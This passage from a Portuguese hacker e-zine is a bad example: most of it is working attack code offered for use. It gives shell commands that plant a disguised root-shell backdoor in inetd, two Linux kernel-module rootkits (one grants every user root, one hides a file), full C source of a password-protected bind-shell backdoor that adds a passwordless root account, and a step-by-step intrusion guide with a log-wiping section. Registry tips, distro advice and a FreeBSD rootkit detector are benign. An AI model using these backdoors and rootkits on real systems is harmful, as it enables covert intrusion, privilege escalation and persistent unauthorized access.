// aqui o bash foi copiado para o diretorio /usr/sbin 
bash# mv /usr/sbin/bash /usr/sbin/in.courierd
// aqui o bash foi renomeado para in.courierd q eh o 
// nome do arkivo para estabelecer a conexao 
bash# chmod a+x  /usr/sbin/in.courierd
bash# echo "$courier stream tcp nowait root /usr/sbin/in.courierd -i" >> /etc/inetd.conf
// setando a backdoor
bash# killall -HUP inetd
bash# telnet alvo.com 530

Pronto. Estah instalando a backdoor. Depois de dar
uma 'telnet alvo 530',vc cairah em uma linda shell
root. Ah! Reparem a linha: 
bash# echo "$courier stream tcp nowait root /usr/sbin/in.courierd -i" >> /etc/inetd.conf
            |
            |-> se o admin nao ver o "$", ele vai achar q estah linha
            estah apenas comentada e nao irah dar atencao para ela e 
            assim vc sempre terah acesso shell root no sistema alvo.

obs: tECNICA iMBECIL
	                                                           Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.


SETOR 17
==[ LKM - (Loadable Kernel Modules) ]==
==[ Por Gotoxy                      ]==

LKM - (Loadable Kernel Modules)

-INTRODUCAO-
LKMs significa Loadable Kernel Modules(Modulos de Kernel Carregaveis).
Em outras palavras, LKMs sao modulos que sao carregados dinamicamente
no kernel para a execucao de determinadas tarefas. Eles sao usados 
para expandir a funcionalidade do kernel e podem ser abertos dinami - 
camente,ou seja,podem ser abertos sem a recompilacao da kernel inteira.
Saber usar e escrever LKMs eh muito importante para o fucador, pois,
com os LKMs eh possui passar pelo tty sem a percebcao do mesmo. E assim
criando rootkits,virus,backdoors,etc no sistema e nao sendo interceptado.    


Aqui nao vou ensinar na escrita de LKMs, pois eh muito complicado 
aprender e muito mais ensinar. Portanto, abaixo segue apenas alguns
exemplos. Mais abaixo tb, vou colocar alguns links onde voce pode
obter mais informacao na escrita de - printk("LKMS"); -  [|:)=[

--[ Listando/Carregando/Descarregando LKM ]--

*Para voce listar um modulo, batsa voce digitar
ma sua shell:
[localhost]# lsmod

*Para voce carregar um modulo, basta voce digitar 
 na sua shell:
[localhost]# insmod nome_do_modulo.o

*Para voce descarregar um modulo,basta vc digitar
 na sua shell:
[localhost]# rmmod nome_do_modulo

Abaixo segue um exemplo de LKM para tornar todo mundo com UID, GID,
EUID iguais a 0. Escrita pelo coracaodeleao (nash leao) :)  Ele,
roda perfeitamente em kernels 2.2.13 (Slackware 7). Portanto, se
o seu kernel for diferente, eh nessesario fazer algumas modificacoes
no codigo do programa abaixo.

---------------------------------todos_root.c---------------------------------

/* Abaixo seguem os defines e includes necessarios */

#define     MODULE
#define   __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/stat.h>
#include <linux/mm.h>
#include <linux/if.h>
#include <sys/syscall.h>
#include <asm/unistd.h>

/* Chamada para a tabela de system calls */

extern void *sys_call_table[] ;


/* Funcao que serah usada p/ "salvar" a configuracao antiga do
   usuario, assim como open acima, ela irah ser apontada para o 
   systemcall que desejamos */

int (*original_getuid)(); 

/* Nossa funcao backdoor para __NR_getuid */

int back_get(){

/* Compara uid atual, se for diferente de zero, ele irah transformar
   as configuracoes que desejamos.Lembre-se que current se refere ao
   processo atual, como vimos anteriormente */

if (current->uid != 0) {
current->uid = 0;
current->gid = 0;
current->euid = 0;
			}
        return 0;
}

int init_module(void){
original_getuid = sys_call_table[__NR_getuid];
sys_call_table[__NR_getuid] = back_get;
printk("<1>Backdoor Instalada com Sucesso!!!\n");
return 0;
}

int cleanup_module(void){
sys_call_table[__NR_getuid] = original_getuid;
printk("<1>Modulo Descarregado!\n");
return 0;
}
---------------------------------todos_root.c---------------------------------

Na shell...
+ Como root:
[loca@lhost]# gcc -c -O3 todos_root.c
[loca@lhost]# insmod todos_root.o
Backdoor Instalada com Sucesso!!!

* Como usuario normal:
[user@normal]$ id
...

You now is root! 


Um outro exemplo que LKM eh o de se esconder um arquivo. Este foi feito
pelo pragmatic e alterado por nash leao. Este eh um LKM para kernel's
2.2.X (foi testado em um 2.2.13 - slack7).
 
---------------------------------escode_arkivo.c---------------------------------

#define   MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>
#include <linux/malloc.h>
#include <linux/dirent.h>

/* Defina o arquivo abaixo para que esconde algum arquivo seu */

#define  ARQUIVO "senhas.txt"


extern void* sys_call_table[];
int (*original_getdents) (uint, struct dirent *, uint);

int hacked_getdents(unsigned int fd, struct dirent *dirp, unsigned int
count)
{
 unsigned int tmp, n;
 int t, proc = 0;
 struct inode *dinode;
 struct dirent *dirp2, *dirp3;
 char oculta[]= ARQUIVO;

/* Abaixo, chama-se o original getdents, o resultado eh salvo em tmp */
tmp = (*original_getdents) (fd, dirp, count);

/* Abaixo segue o manejo do cache do diretorio */
/* Isto precisa ser checado pois pode ser possivel que um antigo getdents
   empurre o resultado sobre a estruta do processo atarefado dcache */

#ifdef __LINUX_DCACHE_H
    dinode = current->files->fd[fd]->f_dentry->d_inode;
#else
    dinode = current->files->fd[fd]->f_inode;
#endif

/* dinode eh o inode do diretorio requerido */

if (tmp > 0)
 {
  /* dirp2 eh uma nova estrutura dirent */

  dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);

  /* copia a estrutura dirent original sobre dirp2 */
  copy_from_user(dirp2, dirp, tmp);

 /* dirp3 aponta para dirp2 */

  dirp3 = dirp2;
  t = tmp;
  while (t > 0)
  {
   n = dirp3->d_reclen;
   t -= n;
/* checa se arquivo atual eh o nome do arquivo que nos queremos ocultar */

   if (strstr((char *) &(dirp3->d_name), (char *) &oculta) != NULL)
   {

/* modifica a estrutura dirente se necessario */
    if (t != 0)
     memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
    else
     dirp3->d_off = 1024;
    tmp -= n;
   }
  if (t != 0)
   dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
  }
  copy_to_user(dirp, dirp2, tmp);
  kfree(dirp2);
 }
 return tmp;
}

int init_module(void)
{
 original_getdents=sys_call_table[__NR_getdents];
 sys_call_table[__NR_getdents]=hacked_getdents;
 printk("<1>Modulo Carregado com Sucesso!!\n");
 return 0;
}

void cleanup_module(void)
{
 sys_call_table[__NR_getdents]=original_getdents;
 printk("<1>Modulo Descarregado com Sucesso!!\n");
}
---------------------------------escode_arkivo.c---------------------------------
Na shell...
[localhost]# gcc -c -O3 escode_arkivo.c
[localhost]# insmod escode_arkivo.o

Logo, o arquivo "senhas.txt" fica invisivel. Defina 
o arquivo a esconder na linha lah em cima (#define
ARQUIVO "nomedoarkivoaesconder").



LKM tb possui suas limitacoes, pois, jah existe programas com intuito
de detectar LKMs no sistema. Um exemplo disso segue abaixo,feito pelo
pIGpEN (pigpen@s0ftpj.org). O programa abaixo foi testado em: FreeBSD
3.4-RELEASE FreeBSD 3.4-RELEASE. Para compilar: make. Uso: make load;
make unload
---------------------------------sec_lkm.c---------------------------------
#include <sys/types.h>
#include <sys/param.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/sysproto.h>
#include <sys/syscall.h>

static int	module_handler		__P((module_t, int, void *));

static moduledata_t S_Check = {
	"scheck",
	module_handler,
	NULL
};

DECLARE_MODULE(scheck, S_Check, SI_SUB_EXEC, SI_ORDER_MIDDLE);

#define	c(x, y, n) if(sysent[x].sy_call!=(sy_call_t *) y) \
 printf("%s: altered! [function] at %p, [syscall] at %p\n", \
		 n, y, sysent[x].sy_call);

static int
module_handler(module_t mod, int cmd, void *arg)
{
	switch(cmd) {
		case MOD_LOAD:
			c(SYS_exit, 		exit, 		"exit");
			c(SYS_fork, 		fork, 		"fork");
			c(SYS_read, 		read, 		"read");
			c(SYS_write, 		write, 		"write");
			c(SYS_open,		open,		"open");
			c(SYS_close,		close,		"close");
			c(SYS_wait4,		wait4,		"wait");
			c(SYS_link,		link,		"link");
			c(SYS_unlink,		unlink,		"unlink");
			c(SYS_chdir,		chdir,		"chdir");
			c(SYS_fchdir,		fchdir,		"fchdir");
			c(SYS_mknod,		mknod,		"mknod");
			c(SYS_chmod,		chmod,		"chmod");
			c(SYS_chown,		chown,		"chown");
			c(SYS_getfsstat,	getfsstat,	"getfsstat");
			c(SYS_getpid,		getpid,		"getpid");
			c(SYS_mount,		mount,		"mount");
			c(SYS_unmount,		unmount,	"unmount");
			c(SYS_setuid,		setuid,		"setuid");
			c(SYS_getuid,		getuid,		"getuid");
			c(SYS_mount,		mount,		"mount");
			c(SYS_unmount,		unmount,	"unmount");
			c(SYS_setuid,		setuid,		"setuid");
			c(SYS_getuid,		getuid,		"getuid");
			c(SYS_geteuid,		geteuid,	"geteuid");
			c(SYS_ptrace,		ptrace,		"ptrace");
			c(SYS_recvmsg,		recvmsg,	"recvmsg");
			c(SYS_sendmsg,		sendmsg,	"sendmsg");
			c(SYS_recvfrom,		recvfrom,	"recvfrom");

			/*
			 * ..... put here other syscalls ....
			 */

			c(SYS_ioctl,		ioctl,		"ioctl");	
			c(SYS_setsockopt,	setsockopt,	"setsockopt");
			c(SYS___sysctl,		__sysctl,	"sysctl");
			break;
	}

	return 0;
}
/*			

# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org > 

.PATH: /sys/kern
SRCS	= sec_lkm.c 
CFLAGS+= -I/sys
KMOD	= seclkm 
NOMAN	= t
KLDMOD	= t

KLDLOAD		= /sbin/kldload
KLDUNLOAD	= /sbin/kldunload

CLEANFILES+= ${KMOD}

load:
	${KLDLOAD} -v ./${KMOD}

unload:
	${KLDUNLOAD} -v -n ${KMOD}

.include <bsd.kmod.mk>

*/

---------------------------------sec_lkm.c---------------------------------			



--[ FIM ]--

Akih abaixo tem alguns links com mais informacoes sobre
escritas de LKMS.Desde jah aviso que eh muito complicado
e eh necessario ter uma base de assembly e C.Aconselho a
primeiramente aprender Assembly e C caso esteja interess
ado no assunto de LKMs. 

(+)- LiNKS

http://Khg.redhat.com/HyperNews/get/Khg.html
http://unsekurity.virtualave.net
http://www.ee.mu.oz.au/linux/programming/
http://teso.scene.at/         -> Procure por adore.tar.gz
http://www.infowar.co.uk/thc/ -> Procure em Articles.
http://www.phrack.com/        -> Procure por phrack 52 item 18.

                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR 18
==[ Backdoors com senha ]==
==[ Por Gotoxy          ]==


Eae! vcs jah devem ter ouvido falar de backdoors,estou certo? Oq?
Nao lembra? Bom, entao eu vou explicar resumidamente. Suponhamos
que voce acesse um sistema com a maior dificuldade e depois de
fazer o que pretende dentro do sistema vc sai. Porem, voce quer
"visitar" o sistema no outro dia e nao quer ter muito trabalho
como teve pela primeira vez. Entao, voce vai logo instalando as
backdoors, para assim, ter acessos futuros sem nenhum trabalho.
Entenderam? Se voce quiser saber mais sobre backdoors, procure
por outras zines pois eu nao vou ficar repetindo a mesma materia
de sempre. Como em muitos zines falam de backdoors, eu resolvi
mudar um pouco. Vou falar de backdoors q utilizam senha. Por 
exemplo, voce instala uma backdoor que binda uma shell. Vamos
supor q vc bindou a porta 3350  e  voce quer q soh voce tenha
acesso, entao,vc vai logo pensar: "tenho que colocar password!"
Assim, soh vc poderah ter acesso no sistema alvo atraves da porta
que vc bindou (q no caso eh a porta 3350).

Se o password for verdadeiro,o sistema eh todo seu!Caso contrario, 
"caia fora !!!" - Assim que funciona o eskema! =)

--------------------
Bind Shell com Senha
--------------------
    Creio que conhecam a famosa backdoors para bindar shell,nao eh?
Entao blza.. Normalmente, voce utliza programas para bindar a shell
e aih eh soh voce conectar pelo porta que o programa bindou ou a 
porta q voce escolheu para bindar que voce vai cair no sistema.mas,
como akih eh bind shell com senha, entao quando voce conectar na porta 
bindada, serah perdido uma senha.. e aih se a senha for incorreta, voce 
nao podera ter acesso, caso contrario, enjoy! Abaixo segue um exemplo
desse programa para bindar a shell com senha:

================================CORTE AKIH================================
/* Gummo backdoor server.
/* compile: cc server.c -o server
/* usage: ./server &
/* echo /tmp/server & >> /etc/rc.d/rc.local
/* so it's always executed after system reboots.
/* Assuming server is in /tmp
/* Have fun script kids, ph1x.  
/* <phixation@hotmail.com> 
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>


#define PORT 31337 /* coloque akih a porta a ser bindada */
#define BACKLOG 5
#define CMD_LOG "/tmp/.cmd"
#define PASSWORD "password" /* coloque akih o passwd q vc deseja */

/* global */
int newfd;

void command ();

void 
main ()
{

  int sockfd, sin_size, ss, len, bytes;

  struct sockaddr_in my_addr;
  struct sockaddr_in their_addr;

  char passwd[1024];
  char *prompt = "Password: ";
  char *gp;

  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror ("socket");
      exit (1);
    }
  my_addr.sin_family = AF_INET;
  my_addr.sin_port = htons (PORT);
  my_addr.sin_addr.s_addr = INADDR_ANY;
  bzero (&(my_addr.sin_zero), 8);

  if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) \
      == -1)
    {
      perror ("bind");
      exit (1);
    }
  if (listen (sockfd, BACKLOG) == -1)
    {
      perror ("listen");
      exit (1);
    }
  while (1)
    {
      ss = sizeof (struct sockaddr_in);
      if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, \
			   &sin_size)) == -1)
	{
	  perror ("accept");
	  exit (1);
	}
      if (fork ())
	{
	  len = strlen (prompt);
	  bytes = send (newfd, prompt, len, 0);
	  recv (newfd, passwd, 1024, 0);

	  if ((gp = strchr (passwd, 13)) != NULL)
	    *(gp) = '\0';

	  if (!strcmp (passwd, PASSWORD))
	    {
	      send (newfd, "Access Granted, HEH\n", 21, 0);
	      send (newfd, "\n\n\n\n\n\nWelcome To Gummo Backdoor Server!\n\n", 41, 0);
	      send (newfd, "Type 'HELP' for a list of commands\n\n", 36, 0);
	      command ();
	    }
	  else if (passwd != PASSWORD)
	    {
	      send (newfd, "Authentification Failed! =/\n", 29, 0);
	      close (newfd);
	    }
	}
    }
}     /* command() will process all the commands sent */
    /* and send back the output of them to your client */

void 
command ()
{

  FILE *read;
  FILE *append;
  char cmd_dat[1024];
  char *cmd_relay;
  char *clean_log;
  char buf[5000];

  int dxm;

  while (1)
    {

      send (newfd, "command:~# ", 11, 0);
      recv (newfd, cmd_dat, 1024, 0);
      cmd_dat[strlen (cmd_dat) - 2] = '\0';
      if (strcmp (cmd_dat, ""))
	{

	  if ((strstr (cmd_dat, "HELP")) == cmd_dat)
	    {
send (newfd, "\n\n-=Help Menu=-\n", 16, 0);
send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0);
send (newfd, "rewt - automatically creates non passworded accnt 'rewt' uid0\n", 63, 0);
send (newfd, "wipeout - this feature rm -rf /'s a box. Inspired by dethcraze\n", 64, 0);
	    }
	  if ((strstr (cmd_dat, "quit")) == cmd_dat)
	    {
	      close (newfd);
	    }
	  if ((strstr (cmd_dat, "rewt")) == cmd_dat)
	    {
	      system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;");
	      send (newfd, "User 'rewt' added!\n", 19, 0);
	    }
	  if ((strstr (cmd_dat, "wipeout")) == cmd_dat)
	    {
	      send (newfd, "Your a dumb fuck for trying to use this command, HEH!\n", 54, 0);
	      close(newfd);
               exit(0);
	    }
	
          else
	    append = fopen (CMD_LOG, "w");
	  fprintf (append, "dextro\n");
	  fclose (append);


	  clean_log = (char *) malloc (420);
	  sprintf (clean_log, "rm %s", CMD_LOG);
	  system (clean_log);

	  cmd_relay = (char *) malloc (1024);
	  snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG);
	  system (cmd_relay);

	  if ((read = fopen (CMD_LOG, "r")) == NULL)
	    continue;
	  while (!(feof (read)))
	    {
	      memset (buf, 0, 500);
	      fgets (buf, 500, read);
	      if (buf[0] == 0)
		break;
	      write (newfd, buf, 500);
	    }
	  fclose (read);
	}
    }
}

================================CORTE AKIH================================

 
Bom pessoal, chegamos ao fim deste setor.. na nossa proxima edicao do
zinesbr, vou colocar mais formas de backdoors com senha.. nao coloquei
todos as formas neste capitulo do zinesbr somente para fazer um pouco
de misterio a todos vcs..:) Agurdem alguns meses, ou anos..:) 
                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [19]
==[ Qual distribuicao devo usar?  ]==
==[ Por Gotoxy                    ]==

Hoje em dia, muitos estao saindo fora do windows
a procura de um sistema operacional mais decente
como por exemplo o linux. Porem, nao sabem qual
distribuicao deve usar.Assim,fica muito dificil
uma pessoa iniciante usar uma distribuicao como
o Debian, pois, ele nao vai saber merda nenhuma
de linux. Por isso, estou eu akih novamente para 
tentar ajuda-los.
    
Se voce pretende ser um fucador, eh recomendavel
que vc use distribuicoes mais complexas,ou seja,
resumindo: distribuicos mais dificil de ser mani
ouladas.

Concluindo...
     Caso voce seja iniciante em unix, utilize
distribuicoes como:

+ Conectiva 5.0
+ Tech Linux
+ Red Hat 7.0
+ Corel Linux
+ Linux Peanut
+ Open Linux (Caldera)

     Caso voce jah esta mais expert no assunto,
utilize as seguintes distribuicoes, pois na minha
opinicao sao as melhores e eu recomendo para os
fucadores em geral:

+ Debian 2.2 Main
+ Slackware 7.0
+ OpenBsd; FreeBsd
+ TurboLinux

Obs: esse txt ficou muito pequeno

                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [20]
==[ Registro do Windows ]==
==[ Por Gotoxy          ]==


As vezes eh bom saber algumas coisinhas sobre o registro
do windows. Porque? Simples pelo motivo que atraves do
registro do windows, podemos fazer varias coisas, como:
crackeia programas, modificar as configuracoes do windows,
etc. Sao muitas as coisas! Mas abaixo, voce verah algumas
dicas do que podemos fazer com o famoso registro do win.  

-----------------------------------------
---[ Entrando no Registro do Windows ]---
-----------------------------------------
O Registro do windows, estah localidador na pasta
c:\windows. Para voce entrar nele, basta clicar
em 'Iniciar', e depois 'Executar'. Em seguite,
digite: regedit. Pronto! Voce tah dentro. 

Por motivo de ser um arquivo muito importante,
ele nao fica "visivel". Pois, um usuario leigo
pode fucar no registro e atrapalhar o windows
todo e assim causara varios problemas no 
sistema. 

----------------------------------
--------[ Antes de tudo ]---------
----------------------------------
Antes de voce comecar a mecher no regedit, eh
altamente recomendavel que voce faca o backup
de dois arkivos super importante: o user.dar
e o system.dat. Pois assim, se voce fizer algo
errado no registro, bastarah apenas volta com
os arkivos user.dar e system.dat para o sistema
funcionar corretamente novamente. 

Portanto, reinicie o computador e aperte a tecla
F8 durante a inicializacao. Logo, selecione a 
opcao: Somente Prompt

Depois disso, acompanhe o exemplo:
C:\ md bkp
C:\ cd windows
C:\Windows> attrib -s -h -r *.dat
C:\Windows> copy *.dat c:\bkp
C:\Windows> attrib +s +h +r *.dat

Agora reinicie o computador.

----------------------------------
-----[ Chaves - Introducao ]-----
----------------------------------
Aqui vou descrever a funcao de cada
uma das chaves. Pois, como sabemos,
o registro do windows possui seis
subspastas, e em cada uma se refere
a uma configuracao diferente. 


+ HKEY_CLASSES_ROOT

Eh um atalho para a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
Essa chave existe apenas para manter
compatibilidade com programas de 16 
bits, uma vez no registro do windows
3.x so havia uma unica chave principal
(a chamada HKEY_CLASSES_ROOT)

+ HKEY_CURRENT_USER 

Essa chave eh um atalho para o usuario
que fez logon no sistema. Por exemplo:
digamos q o usuario Gotoxy fez logon
no sistema, entao a chave apontara para:
HKEY_CURRENT_USER\Gotoxy

+ HKEY_LOCAL_MACHINE

Essa eh a chave mais importante do 
registro. Eh nesta chave que estao
armazenadas as informacoes a respeito
dos perifericos e programas instalados 
no sistema. Inclui a configuracao do
windows tb e essas e outras infos estao
armazenadas no arquivo System.dat

+ HKEY_USERS

Esta chave permite q mais de um usuario
utilize o mesmo computador e cada um
com suas configuracoes particulares,
como: protecao de tela, plano de fundo,
etc. Para fazer esse tipo de controle,
a chave HKEY_USERS, se baseia na escolha
do usuario, q eh feita no logon do windows.
Esta chave armazena as configuracoes do
sistema para cada usuario no file User.dat

+ HKEY_CURRENT_CONFIG

Esta chave tb eh um atalho para outro local,
mas agora o atalho aponta para a chave abaixo:
HKEY_LOCAL_MACHINE\Config\nnn
Onde nnn eh o perfil de hardware q estah 
atualmente configurado. Como na maioria dos
micros soh hah um unico perfil perfil de 
hardware configurado, normalmente essa chave
aponta para: 
HKEY_LOCAL_MACHINE\Config\0001
Para voce saber qual perfil de hardware esta
sendo utilizado no sistema, basta ir em:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
control\IDConfigDB

+ HKEY_DYN_DATA

Todas as configuracoes armazedanas nas chaves
anteriores sao estaticas, ou seja, sao armazenadas
em algum lugar do hd (em geral nos arkivos User.dat
e System.dat). A chave HKEY_DYN_DATA contem infos
dinamicas e q existem somente na sessao atual.Essas
informacoes sao lidas durante o boot da makina e 
contem dados como a lista de dispositivos Plug and
Play instalados no micro (elas sao armazenadas na
subchave ConfigManager\Enum). Essas informacoes 
ficam armazenadas em memoria RAM e portanto sao
criadas a cada boor da makina.

----------------------------------
-------[ Algumas dicas ] ---------
----------------------------------
(0)- Indice
(1)- Deixando o 'iniciar' mais veloz
(2)- Nome do computador 
(3)- Tirando as setas dos links
(4)- Removendo programas
(5)- Icones BMP
(6)- Animacao das Janelas
(7)- Menu Executar
(8)- Nome longo no windows
----------------------------------

(1)- Deixando o 'iniciar' mais veloz

Com issso voce poderah deixar o menu 
iniciar mais rapido de ser exibido. 

Localize a chave HKEY_CURRENT_USER\
Control Panel\Desktop

Clique com o botao direito, escolha
Novo, Chave. Em seguite, coloque o
nome da chave criada de MenuShowDelay
e pressione Enter.

No lado esquerdo aparecerah uma opcao
chamada 'Padrao'. De dois cliques nela
e coloque um numero entre 1 e 10 sendo
1 a velocidade mais rapida.

Obs: Eh necessario reiniciar o 
computador para as modificacoes
serem alteradas com exito.
----------------------------------

(2)- Nome do computador

Eh possivel modificar o nome do seu
computador. 

Lozalize a chave

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
control\Computername\Computername

No lado direito da tela, clique 2x em
'Computername'.

Digite o novo nome do seu computador no
campo 'Dados do valor'.

Obs: Eh necessario reiniciar o 
computador para as modificacoes
serem alteradas com exito.

----------------------------------

(3)- Tirando as setas dos links

Quando voce cria um link ele fica
com uma pequena setinha no canto 
inferior do icone. Eh possivel
retirar essa setinha! Como? Da
seguinte maneira:

Lozalize a chave 
HKEY_CLASSES_ROOT\LNKFILE

De um clique sobre a chave lsShortCut
e pressione a tecla DELETE.

Na proxima vez que voce reiniciar 
o sistema a seta nao existira mais
no links.

----------------------------------

(4)- Removendo programas

As vezes voce costuma remover os 
programas atraves do 'Remover Arquivos
e Programas', que fica localizado no
'Painel de Controle'. Porem, o arquivo
insiste em continuar lah, entao devemos
fazer o seguinte:

Localize a chave: 

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Uninstall

Agora basta apagar a chave referente ao
programa.

----------------------------------

(5)- Icones BMP

Eh possivel substituir os icones de 
imagens BMP (aqueles por default) por
uma miniatura da propria figura. Basta
fazer o seguinte:

Localize a chave:
HKEY_CLASSES_ROOT\paint.picture\Defaultlcon

De dois cliques sobre a chave e altere o valor
para %1.

----------------------------------

(6)- Animacao das Janelas

Ao maximizar ou minimizar uma janela, voce
percebe uma pequena animacao. Para eliminar
esse efeito, faca o seguinte:

Lozalise a chave:
HKEY_CURRENT_USER\Control Panel\Desktop\
WindowMetrics

Clique com o botao direito do mouse e 
escolha Novo, Valor da Cadeia. De o nome
de: MinAnimate

Em seguida, de dois cliques em MinAnimate
e digite o valor sendo 0 (zero).

Obs: Eh necessario reiniciar o 
computador para as modificacoes
serem alteradas com exito.
----------------------------------

(7)- Menu Executar

Se voce costuma usar o Iniciar/Executar
para iniciar programas, voce percebe q
ele acumula os softwares recenmentes 
iniciados. Para limpar essa lista, faca
o seguinte:

Localize a chave:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\RunMru

Apague todos os programas da lista, 
exceto o item descrito como 'Padrao'
(q eh o primeiro da lista).

Obs: Eh necessario reiniciar o 
computador para as modificacoes
serem alteradas com exito.
----------------------------------

(8)- Nome longo no windows

Toda vez q um arkivo de nome longo
(com mais de 8 caracteres) aparece
na janela do ms-dos,ele eh exibido
do seguinte formato: 'arquiv~1'.Se
voce quiser que o windows troque o
'arquiv~1' para 'arquivos' ou etao 
'meusdo~1.doc' para 'meusdocu.doc'
faca o seguinte: 

Localize a chave:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Control\Filesystem

Clique com o botao direito do mouse
na tela direita,escolha Novo, Valor
Binario. Digite "NameNumericTail" e
aperte [ENTER]. obs: sem aspas

Repita o mesmo procedimento anterior
soh q agora digite 0 (zero) e aperte
[ENTER]. 

Reinicie o windows.A partir de entao,
todos os novos arkivos criados nao 
usaram a extensao "~1". Os arkivos
gerados antes dessa modificao nao 
terao seus nomes alterados. Se vc
quiser desfazer a alteracao,eh so
apagar a entrada "NameNumericTail".

  
----------------------------------
------[ Palavras finais ] --------
----------------------------------

Espero com isso ter ajudado um pouco
aos usuarios que utilizam o windows.
Com estas dicas voce conferiu como o
registro pode ajuda-lo a personalizar
o windows. A unica forma de vc dominar
o registro do windows eh fucando. Porem,
nunca se eskeca de fazer o backup.

Sem mais.
                                                                 Gotoxy
     					                                   gotoxy@zines-br.com
.:x| ------------------------------------------------------------------------------ |x:.









SETOR [21]
==[ Invadindo um sistema ]==
==[ Por Gotoxy           ]==

INDICE
0. INTRODUCAO
1. PASSO A PASSO PARA INVADIR UM SISTEMA
   1.2 ENTRANDO ATRAVES DE BACKDOORS INSTALADAS
   1.3 APAGANDO OS LOGS DO SISTEMA
2. LINKS
3. ULTIMAS PALAVRAS

   
0.INTRODUCAO
Estou colocando esse texto para voce aprender
como vc deve proceder para invadir um sistema 
ou uma rede. Lembrando que ensino isso,apenas
com intuito educacional.Nao me responsabilizo
por voce, caso faca algo de errado. Portanto,
eh recomendavel que vc apenas leia o texto 
abaixo. 
Uma coisa que eu queria deixar bem claro, eh
q esse metodo eh o metodo kiddie, pois voce jah
pega programas prontos e nao tem nenhum trabalho
para acessar uma rede\servidor.Portanto,aconselho
que voce fuce bastante e aprenda a fazer seus 
proprios programas que explorem falhas e nao ficar
pegando tudo de mao beijada. =]

 
1.PASSO A PASSO PARA INVADIR UM SISTEMA

-> A primeira coisa que voce deve fazer obter
o maximo de informacoes do servidor, como 
por exemplo: o tipo de sistema operacional que
ele estah usando (eg: tecnica fingerprint),obter
as vulnerabilidades do servidor, por exemplo:
vulnerabilidades de cgi, servidor de ftp,sendemail,
etc. 

-> O proximo passo, eh voce anotar tudo q venha
a ser util,que sao: as vulnerabilidades do host,
etc. Depois de tudo anotadinho, voce pega os 
arkivos necessarios para obter acesso ao server
alvo. Por exemplo, suponhamos que voce encontre
um servidor rodando o "famoso" wu-ftpd como 
servidor de ftp,logo,voce vai procurar o xploit
para explorar a vulnerabilidade dele, de acordo
com a versao do wu-ftpd, com intuitos de obter
root no sistema. Mais abaixo, vamos saber de 
alguns links onde podemos encontrar os exploits.

-> Uma coisa muito importante: eh altamente 
recomendavel que voce utilize um unix ou linux
na sua makina, pois assim facilitarah muito o
nosso trabalho, alem de agilizara muito. O
motivo de se usar um unix/linux como sendo
o seu so (sistema operacional) eh simples:
a maioria dos programas para explorar falhas
estao escritos em C. E a maioria do servidores
estao rodando um unix na makina deles. putz,
tem varios motivos para isso. Se eu for colocar
todos os motivos, isto akih ficara enorme =] ! 
Portanto, se vc quer saber de todos os motivos,
procura na Net mesmo! =]

-> Bom, depois que voce pegou os programas para
explorar as falhas do servidor alvo,voce utiliza 
todos ele, ateh um funfa (funcionar). Se funfa,
nas maiorias da vezes voce se loga como root,
ou seja, super usuario, ou seja denovo: o sistema
eh todo seu amigo! Ainda nao acabou, como vc eh
um hacker e nao um cracker, voce deve soh entrar,
olhar e sair. Porem, antes de sair, voce nao pode
deixar rastros, estou certo? Pois eh, portanto,
mais abaixo voce saberah como acabar com os 
logs.

###################
 ]=-[ pratica ]-=[ 
###################

-> Primeiro, utilize um scan para vermos as 
vulnerabilidades do sistema. Para isso, vamos
usar o nmap. Caso nao tenha ele, pegue-o no
site: www.unsecure.org/nmap. Faca o donwload
e depois instale. Depois de instalado, digite:
bash# nmap localhost
soh para voce ver como ele funciona. Para voce
scaneador um host e obtendo o maximo de info,
como por exemplo: a versao do SO, etc basta 
digitar:
bash# nmap -sX -O localhost 80
Pronto,agora espere acabar de scanear. Logo,
voce deve anotar as vulnerabilidades encontradas,
se nao quiser anotar, decore na kbca mesmo =].
Depois, entre no site da packetstorm.. a url eh:
http://packetstorm.securify.com
E procure por programas ou textos que ensinam 
como explorar as falhas encontradas no servidor. 



1.2 ENTRANDO ATRAVES DE BACKDOORS INSTALADAS

procure entrar pelas backdoors instaladas no
servidor, caso o servidor jah tenha sido invadida
e caso o invasor colocara backdoors no mesmo.

-(01)- Metodo Rhosts
Entrando em servers com a backdoor do .rhosts
instalada:
[localhost]# rlogin -l root www.<host>.com.br

-(02)- Metodo Bind Shell
Depois de voce ter scaneador o sistema, olhe
se uma porta alta estah aberta. Caso esteja,
